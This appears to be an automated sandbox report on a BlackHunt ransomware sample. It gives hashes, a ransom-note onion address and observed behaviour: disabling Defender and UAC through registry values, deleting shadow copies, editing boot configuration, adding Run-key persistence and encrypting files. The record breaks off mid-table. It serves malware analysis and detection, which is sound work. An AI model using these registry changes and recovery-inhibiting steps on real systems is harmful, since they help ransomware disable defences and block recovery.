Analysis
-
max time kernel
160s -
max time network
161s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
18-01-2024 22:30
Static task
static1
Behavioral task
behavioral1
Sample
0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe
Resource
win10v2004-20231215-en
General
-
Target
0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe
-
Size
707KB
-
MD5
dbd4f59e735979f850bdef7cd00cac2c
-
SHA1
987c453aa7400bbc1d54a8c4110c9f4a9186aefd
-
SHA256
0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f
-
SHA512
4b92735aa7b9a74d11e8b477aa90b05e4e05d7f82d229b1a428ab4aa81f5e3ccd2deddc916c7f0b37afeed9556edd2d4bae91a16ee2bef92a5b51bd2c85a8800
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1o8yvnh:6uaTmkZJ+naie5OTamgEoKxLWjch
Malware Config
Extracted
F:\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 1 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 2636 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 6104 bcdedit.exe 4864 bcdedit.exe -
Renames multiple (1413) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 932 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe -
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\W: 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe File opened (read-only) \??\Y: 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe File opened (read-only) \??\B: 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe File opened (read-only) \??\R: 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe File opened (read-only) \??\G: 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe File opened (read-only) \??\U: 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe File opened (read-only) \??\L: 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\Q: 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe File opened (read-only) \??\P: 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe File opened (read-only) \??\X: 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe File opened (read-only) \??\N: 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe File opened (read-only) \??\E: 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe File opened (read-only) \??\A: 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe File opened (read-only) \??\O: 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe File opened (read-only) \??\V: 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe File opened (read-only) \??\T: 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe File opened (read-only) \??\I: 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe File opened (read-only) \??\K: 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe File opened (read-only) \??\Z: 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe File opened (read-only) \??\M: 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe File opened (read-only) \??\S: 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe File opened (read-only) \??\H: 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe File opened (read-only) \??\J: 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe File opened (read-only) \??\F: vssadmin.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 5 ip-api.com -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\VideoLAN\VLC\locale\da\LC_MESSAGES\#BlackHunt_ReadMe.txt 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe File created C:\Program Files\VideoLAN\VLC\plugins\video_filter\#BlackHunt_Private.key 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\en-ae\#BlackHunt_Private.key 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\sv-se\#BlackHunt_ReadMe.hta 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe File opened for modification C:\Program Files\VideoLAN\VLC\hrtfs\dodeca_and_7channel_3DSL_HRTF.sofa 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\status.xml 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\vimeo.luac 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\core\dev\cef\#BlackHunt_Private.key 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\es-es\#BlackHunt_Private.key 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\pt-br\#BlackHunt_Private.key 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe File created C:\Program Files\VideoLAN\VLC\locale\hu\LC_MESSAGES\#BlackHunt_ReadMe.txt 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe File created C:\Program Files\VideoLAN\VLC\locale\ka\#BlackHunt_Private.key 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\vi\LC_MESSAGES\vlc.mo 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe File created C:\Program Files\VideoLAN\VLC\lua\#BlackHunt_ReadMe.txt 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\#BlackHunt_ReadMe.txt 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\en-ae\#BlackHunt_ReadMe.hta 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\deploy\messages_ja.properties 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\ext\access-bridge-64.jar 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe File created C:\Program Files\Java\jre-1.8\lib\fonts\#BlackHunt_ReadMe.txt 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\it\LC_MESSAGES\vlc.mo 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\plugins\rhp\#BlackHunt_ReadMe.hta 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe File created C:\Program Files\dotnet\host\fxr\6.0.25\#BlackHunt_Private.key 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\be\LC_MESSAGES\vlc.mo 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\is\LC_MESSAGES\vlc.mo 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_share_18.svg 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\en-ae\#BlackHunt_Private.key 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe File created C:\Program Files\VideoLAN\VLC\locale\nb\LC_MESSAGES\#BlackHunt_ReadMe.txt 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\#BlackHunt_Private.key 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe File created C:\Program Files\VideoLAN\VLC\locale\ast\#BlackHunt_Private.key 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe File created C:\Program Files\VideoLAN\VLC\locale\bg\LC_MESSAGES\#BlackHunt_Private.key 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe File created C:\Program Files\VideoLAN\VLC\locale\bn\#BlackHunt_ReadMe.hta 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\si\LC_MESSAGES\vlc.mo 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\logo_retina.png 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\km\LC_MESSAGES\vlc.mo 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ui-strings.js 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\security\policy\unlimited\#BlackHunt_ReadMe.txt 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe File created C:\Program Files\VideoLAN\VLC\locale\ast\#BlackHunt_ReadMe.txt 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe File created C:\Program Files\VideoLAN\VLC\locale\fi\#BlackHunt_Private.key 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\tr-tr\#BlackHunt_ReadMe.hta 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\duplicate.svg 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\sl-si\#BlackHunt_ReadMe.txt 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ru-ru\#BlackHunt_ReadMe.hta 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\arrow-left.gif 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\nl-nl\#BlackHunt_ReadMe.hta 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\root\#BlackHunt_Private.key 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\A12_Spinner_int_2x.gif 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\xmlresolver.md 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe File created C:\Program Files\VideoLAN\VLC\locale\ro\LC_MESSAGES\#BlackHunt_ReadMe.txt 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\koreus.luac 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_228ef1_256x240.png 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Locale\en_US\#BlackHunt_Private.key 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\pl-pl\#BlackHunt_ReadMe.txt 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe File opened for modification C:\Program Files\7-Zip\7z.sfx 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Locale\en_US\#BlackHunt_ReadMe.hta 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\cs-cz\#BlackHunt_ReadMe.txt 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ar-ae\ui-strings.js 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\nb-no\#BlackHunt_ReadMe.hta 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sl-si\#BlackHunt_Private.key 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\de-de\#BlackHunt_ReadMe.hta 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\psfontj2d.properties 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\fontconfig.bfc 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\management\jmxremote.password.template 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe File created C:\Program Files\Java\jre-1.8\legal\javafx\#BlackHunt_Private.key 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\en-gb\#BlackHunt_Private.key 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 6000 schtasks.exe -
Interacts with shadow copies 2 TTPs 5 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 5912 vssadmin.exe 6080 vssadmin.exe 5936 vssadmin.exe 5928 vssadmin.exe 5960 vssadmin.exe -
Modifies registry class 12 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2 reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe -
Suspicious use of AdjustPrivilegeToken 13 IoCs
description pid Process Token: SeDebugPrivilege 1920 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe Token: SeRestorePrivilege 1920 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe Token: SeBackupPrivilege 1920 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe Token: SeTakeOwnershipPrivilege 1920 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe Token: SeAuditPrivilege 1920 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe Token: SeSecurityPrivilege 1920 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe Token: SeIncBasePriorityPrivilege 1920 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe Token: SeBackupPrivilege 6072 vssvc.exe Token: SeRestorePrivilege 6072 vssvc.exe Token: SeAuditPrivilege 6072 vssvc.exe Token: SeBackupPrivilege 4864 wbengine.exe Token: SeRestorePrivilege 4864 wbengine.exe Token: SeSecurityPrivilege 4864 wbengine.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1920 wrote to memory of 2924 1920 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe 89 PID 1920 wrote to memory of 2924 1920 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe 89 PID 1920 wrote to memory of 4644 1920 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe 91 PID 1920 wrote to memory of 4644 1920 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe 91 PID 1920 wrote to memory of 2532 1920 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe 170 PID 1920 wrote to memory of 2532 1920 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe 170 PID 1920 wrote to memory of 4516 1920 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe 169 PID 1920 wrote to memory of 4516 1920 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe 169 PID 1920 wrote to memory of 3068 1920 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe 161 PID 1920 wrote to memory of 3068 1920 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe 161 PID 2924 wrote to memory of 3928 2924 Process not Found 99 PID 2924 wrote to memory of 3928 2924 Process not Found 99 PID 3068 wrote to memory of 4164 3068 Conhost.exe 103 PID 3068 wrote to memory of 4164 3068 Conhost.exe 103 PID 4644 wrote to memory of 4328 4644 cmd.exe 102 PID 4644 wrote to memory of 4328 4644 cmd.exe 102 PID 4516 wrote to memory of 1804 4516 reg.exe 163 PID 4516 wrote to memory of 1804 4516 reg.exe 163 PID 2532 wrote to memory of 4948 2532 reg.exe 100 PID 2532 wrote to memory of 4948 2532 reg.exe 100 PID 1920 wrote to memory of 4656 1920 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe 104 PID 1920 wrote to memory of 4656 1920 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe 104 PID 1920 wrote to memory of 636 1920 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe 105 PID 1920 wrote to memory of 636 1920 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe 105 PID 1920 wrote to memory of 680 1920 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe 108 PID 1920 wrote to memory of 680 1920 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe 108 PID 1920 wrote to memory of 1300 1920 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe 125 PID 1920 wrote to memory of 1300 1920 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe 125 PID 1920 wrote to memory of 1088 1920 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe 110 PID 1920 wrote to memory of 1088 1920 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe 110 PID 1920 wrote to memory of 3780 1920 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe 124 PID 1920 wrote to memory of 3780 1920 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe 124 PID 1920 wrote to memory of 3244 1920 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe 114 PID 1920 wrote to memory of 3244 1920 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe 114 PID 1920 wrote to memory of 2972 1920 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe 115 PID 1920 wrote to memory of 2972 1920 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe 115 PID 1920 wrote to memory of 5036 1920 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe 118 PID 1920 wrote to memory of 5036 1920 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe 118 PID 1920 wrote to memory of 4500 1920 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe 123 PID 1920 wrote to memory of 4500 1920 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe 123 PID 1920 wrote to memory of 1748 1920 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe 119 PID 1920 wrote to memory of 1748 1920 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe 119 PID 1920 wrote to memory of 1136 1920 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe 121 PID 1920 wrote to memory of 1136 1920 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe 121 PID 1920 wrote to memory of 4984 1920 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe 129 PID 1920 wrote to memory of 4984 1920 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe 129 PID 1920 wrote to memory of 2172 1920 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe 134 PID 1920 wrote to memory of 2172 1920 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe 134 PID 1920 wrote to memory of 3628 1920 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe 130 PID 1920 wrote to memory of 3628 1920 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe 130 PID 1920 wrote to memory of 2456 1920 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe 132 PID 1920 wrote to memory of 2456 1920 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe 132 PID 1920 wrote to memory of 3508 1920 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe 153 PID 1920 wrote to memory of 3508 1920 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe 153 PID 1920 wrote to memory of 4972 1920 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe 152 PID 1920 wrote to memory of 4972 1920 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe 152 PID 1920 wrote to memory of 3596 1920 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe 142 PID 1920 wrote to memory of 3596 1920 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe 142 PID 1920 wrote to memory of 3348 1920 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe 138 PID 1920 wrote to memory of 3348 1920 